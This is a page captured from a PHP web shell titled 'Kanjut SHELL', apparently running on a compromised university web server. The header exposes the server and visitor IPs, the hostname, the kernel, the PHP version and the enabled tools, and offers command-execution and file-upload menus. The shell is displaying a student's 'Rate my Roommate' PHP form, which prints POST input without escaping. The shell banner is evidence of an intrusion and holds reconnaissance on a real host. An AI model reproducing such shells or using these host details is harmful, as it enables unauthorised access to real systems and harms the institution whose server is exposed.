Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 18.119.141.115
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/gskellam/../akshoop/public_html/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/gskellam/../akshoop/public_html/rateMyRoommate2.php
<html>
<head>
<style>
body {
  font-family: "Apple Chancery", cursive;
  background-color: white;
  margin: 0;
}

ul {
  list-style-type: none;
  height: 100%;
  width: 250px;
  position: fixed;
  top: 0;
  left: 0;
  background-color: #555;
  overflow: auto;
  padding-top:20px;
  padding: 0;
  margin: 0;
}

li a {
  display: block;
  color: white;
  padding: 6px 8px 6px 16px;
  text-decoration: none;
  font-size: 20px;
  width: 100%;
  text-align: left;
  cursor: pointer;
}

li a.active {
  background-color: #81a4db;
  color: white;
}

li a:hover:not(.active) {
  background-color: #81a4db;
  color: white;
}
</style>
</head>
<body>

<ul>
  <li><a href="projectIndex.html">Home</a></li>
  <li><a href="housingInformation.html">Information</a></li>
  <li><a class="active" href="rateMy.html">Rating Forms</a></li>
  <li><a href="rateMyTable.html">Tables</a></li>
  <li><a href="FAQs.html">FAQs</a></li>
  <li><a href="admin.html">Admin Login</a></li>
</ul>

<div style="margin-left:250px;padding:0px 10px;height:1000px;font-size: 20px;">
  <h2>Rate my Roommate</h2>
	<h3>
<?php
	session_start();

	$name = $_POST["name"];
	$cleanliness = $_POST["cleanliness"];
	$personalItems = $_POST["personalItems"];
	$windows = $_POST["windows"];
	$door = $_POST["door"];
	$trashCan = $_POST["trashCan"];

	$_SESSION["name"] = $name;
	$_SESSION["cleanliness"] = $cleanliness;
	$_SESSION["personalItems"] = $personalItems;
	$_SESSION["windows"] = $windows;
	$_SESSION["door"] = $door;
	$_SESSION["trashCan"] = $trashCan;

//print "Debug: $cleanliness, $personalItems, $windows, $door, $trashCan.<BR>";
?>

	<FORM action=rateMyRoommate3.php method=post>
	<?php	print "Roommate name: $name<BR>";	?>
	Their guests:<BR>
          <INPUT type=radio name=guest1 value=" Used private facilities or beds without permission ">Used private facilities or beds without permission<BR>
	  <INPUT type=radio name=guest1 value=" Used private facilities or beds with permission ">Used private facilities or beds with permission<BR>
	  <INPUT type=radio name=guest1 value=" No Opinion ">No Opinion<BR>
	  <BR>
	  <INPUT type=radio name=guest2 value=" Were often of the opposite sex ">Were often of the opposite sex<BR>
	  <INPUT type=radio name=guest2 value=" Were sometimes of the opposite sex ">Were sometimes of the opposite sex<BR>
	  <INPUT type=radio name=guest2 value=" Were never of the opposite sex ">Were never of the opposite sex<BR>
	  <INPUT type=radio name=guest2 value=" No Opinion ">No Opinion<BR>
	  <BR>
	  <INPUT type=radio name=guest3 value=" Stayed the night frequently ">Stayed the night frequently<BR>
	  <INPUT type=radio name=guest3 value=" Stayed the night sometimes ">Stayed the night sometimes<BR>
	  <INPUT type=radio name=guest3 value=" Never stayed the night ">Never stayed the night<BR>
	  <INPUT type=radio name=guest3 value=" No opinion ">No Opinion<BR>
	Privacy was needed:<BR>
	  <select name=privacy>
	    <OPTION></OPTION>
	    <OPTION>Once a day</OPTION>
	    <OPTION>Once a week</OPTION>
	    <OPTION>Once a month</OPTION>
	    <OPTION>No opinion</OPTION>
	  </select><BR>
	<BR>
	<INPUT type=submit value="Next">
	</FORM>
	<BR>
	<BR>
	<BR
	</h3>
</div>

</body>
</html>


Stv3n404 - 2023